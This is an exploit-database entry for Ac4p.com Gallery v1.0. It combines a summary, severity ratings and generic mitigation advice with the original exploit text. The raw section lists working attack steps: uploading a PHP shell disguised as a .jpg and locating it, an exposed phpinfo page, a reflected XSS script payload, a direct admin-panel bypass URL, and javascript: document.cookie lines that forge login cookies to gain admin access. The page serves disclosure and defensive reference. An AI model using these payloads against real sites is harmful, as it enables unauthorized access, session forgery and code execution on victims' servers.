Ac4p.com Gallery v1.0 Mullti Vulnerability

vendor:

Ac4p.com Gallery

by:

indoushka

8,8

CVSS

HIGH

Upload Vulnerability, Php info, XSS, By Pass, Insecure Cookie Handling Vulnerability

434, 79, 352, 285, 613

CWE

Product Name: Ac4p.com Gallery

Affected Version From: v1.0

Affected Version To: v1.0

Patch Exists: No

Related CWE: N/A

CPE: a:ac4p:ac4p.com_gallery:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux

2007

Ac4p.com Gallery v1.0 Mullti Vulnerability

A vulnerability in Ac4p.com Gallery v1.0 allows an attacker to upload malicious files, view php info, execute XSS payloads, bypass authentication, and exploit insecure cookie handling.

Mitigation:

Ensure that the application is configured to only allow the upload of files with the appropriate file extensions, and that the application is configured to only allow the upload of files with the appropriate file size. Additionally, ensure that the application is configured to only allow the upload of files with the appropriate MIME type. Ensure that the application is configured to properly sanitize user-supplied input. Ensure that the application is configured to properly validate user-supplied input. Ensure that the application is configured to properly authenticate users. Ensure that the application is configured to properly handle cookies.

Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : Ac4p.com Gallery v1.0 Mullti Vulnerability      
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)                                                                             
| # Web Site : www.iq-ty.com                                                                                                                            
| # Dork     : Powered by Ac4p.com Gallery v1.0 , Copyright© 2007 ac4p.com                                         
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : Mullti                                                                     
======================      Exploit By indoushka       =================================
# Exploit  : 

1 - Upload Vulnerability:
 
 I- http://server/gallery/up.php (To upload Evil )
 
 II- http://server/gallery/userup/1266607903.jpg.php (To Find Evil)
 
 2 - Php info:
 
 http://server/gallery/phpinfo.php
 
 3 - XSS:
 
 http://server/gallery/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
 
 4 - By Pass:
 
 http://server/gallery/cp/menu.php
 
 Insecure Cookie Handling Vulnerability:
 
 I-   javascript:document.cookie="user_id=userid;path=/";
 II-  javascript:document.cookie="password=password;path=/";
 III- javascript:document.cookie="username=username;path=/";
 IIV- javascript:document.cookie="ok=tmam;path=/";
 
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * Xproratix ==========================================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (Tinjah.com) * Yashar (sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (v4-team.com) * www.securitywall.org * r1z (www.sec-r1z.com)* www.arhack.net
www.securityreason.com * www.packetstormsecurity.org * Cyb3r IntRue (avengers team)* www.sec-war.com
www.hacker.ps * no-exploit.com * www.bawassil.com * www.xp10.me * www.mormoroth.net*www.alkrsan.net  
--------------------------------------------------------------------------------------------------------------